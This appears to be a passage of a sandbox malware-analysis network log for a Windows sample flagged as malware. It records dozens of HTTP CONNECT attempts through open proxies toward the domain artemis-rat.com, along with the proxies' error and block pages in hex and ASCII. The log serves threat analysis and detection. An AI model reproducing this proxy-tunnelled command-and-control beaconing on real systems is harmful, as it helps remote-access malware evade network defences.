                                              Data Ascii: pe=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{padding:0;border-style:none}input[type=checkbox],input[type=radio]{box-sizing:border-box;padding:0}input[type=date],input[type=datetime-local],input[type=mont
                                              Mar 11, 2024 08:37:24.739895105 CET344INData Raw: 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 6e 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 2c 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d 77 65 62
                                              Data Ascii: rtical-align:baseline}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{outline-offset:-2px;-webkit-appearance:none}[type=search]::-webkit-search-cancel-button,[type=search]::-webkit-se
                                              Mar 11, 2024 08:37:24.943285942 CET536INHTTP/1.1 501 Not Implemented
                                              Set-Cookie: SWAFS=eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJfIjoiYXJ0ZW1pcy1yYXQuY29tOjQ0MzE1NC4xNi4xMDUuMzgifQ.-RhoK-33KjwsPYTEp7J3U-vTZ5IIiPQ4Rn1uMoLWFKLG5Xtb8PYdMa_5oKi_evt183CEMTk7Qe9TxdDchZYqrg; Path=/; Domain=artemis-rat.com; Expires=Tue, 12 Mar 2024 07:37:24 GMT; HttpOnly; SameSite=Strict
                                              X-Waf-Req-Id: dfcc5686-0c5d-469a-99f6-450960222ca7-712024
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Data Raw: 38 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 3e 0a 09 09 3c 68 65 61 64 3e 0a 09 09 09 3c 74 69
                                              Data Ascii: 800<!DOCTYPE html><html><head><ti
                                              Mar 11, 2024 08:37:25.038943052 CET536INData Raw: 62 75 74 74 6f 6e 7d 6f 75 74 70 75 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 74 65 6d 70 6c 61
                                              Data Ascii: button}output{display:inline-block}summary{display:list-item;cursor:pointer}template{display:none}[hidden]{display:none!important}</style><style type="text/css">body,html{background-color:#333333;height:100%}.container{display: flex;justify-c
                                              Mar 11, 2024 08:37:25.039050102 CET536INData Raw: 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 68 65 61 64 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 2e 35 65 6d 3b 70
                                              Data Ascii: hover{text-decoration:none}header{width:100%;text-align:center;padding-top:1.5em;padding-bottom:.5em}.logo{display:block;height:7em;width:14em;margin:0 auto 2em;background-repeat:no-repeat;background-size:contain;background-position:center bot
                                              Mar 11, 2024 08:37:25.039057016 CET536INData Raw: 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 33 30 72 65 6d 7d 2e 73 74 61 74 75 73 3a 3a 61 66 74
                                              Data Ascii: dding:0;margin-left:auto;margin-right:auto;width:100%;max-width:30rem}.status::after{content:"";height:0;width:0;display:block;clear:both}.status>li{width:33.333333%;float:left;padding:0 1em;text-align:center;position:relative}.status>li,.stat


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1558192.168.2.45478239.108.227.108807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.444103956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.782733917 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1559192.168.2.454823130.255.162.199203987284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.451602936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257026911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257361889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.164697886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.053961992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.868583918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.757324934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.366323948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:02.569346905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1560192.168.2.45481891.189.177.18931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.451886892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.772113085 CET1286INHTTP/1.1 403 Forbidden
                                              Server: squid/5.7
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3628
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              X-Cache: MISS from lb1
                                              X-Cache-Lookup: NONE from lb1:3128
                                              Via: 1.1 lb1 (squid/5.7)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1561192.168.2.454831147.75.34.86100107284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.452162027 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:24.756123066 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1562192.168.2.45482760.188.102.225180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.452416897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1563192.168.2.454828186.124.164.213807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.452526093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1564192.168.2.454921104.24.136.68807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.453701973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.608267069 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1565192.168.2.454935104.16.105.207807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.454154968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.609608889 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1566192.168.2.454917104.20.225.218807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.454503059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.609724998 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1567192.168.2.45494443.153.16.2304437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.456603050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1568192.168.2.454851121.128.194.154807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.456619978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1569192.168.2.454835185.38.111.180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.464945078 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:24.785906076 CET75INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:25.131406069 CET103INHTTP/1.1 400 Bad Request
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                              Data Ascii: 400 Bad Request


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1570192.168.2.45483443.133.74.172156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.468003035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1571192.168.2.454221142.54.231.3841457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.469825983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1572192.168.2.454829185.217.143.23807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.469856977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1573192.168.2.4548465.252.23.22010817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.472255945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1574192.168.2.45485558.234.116.19781937284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.473169088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


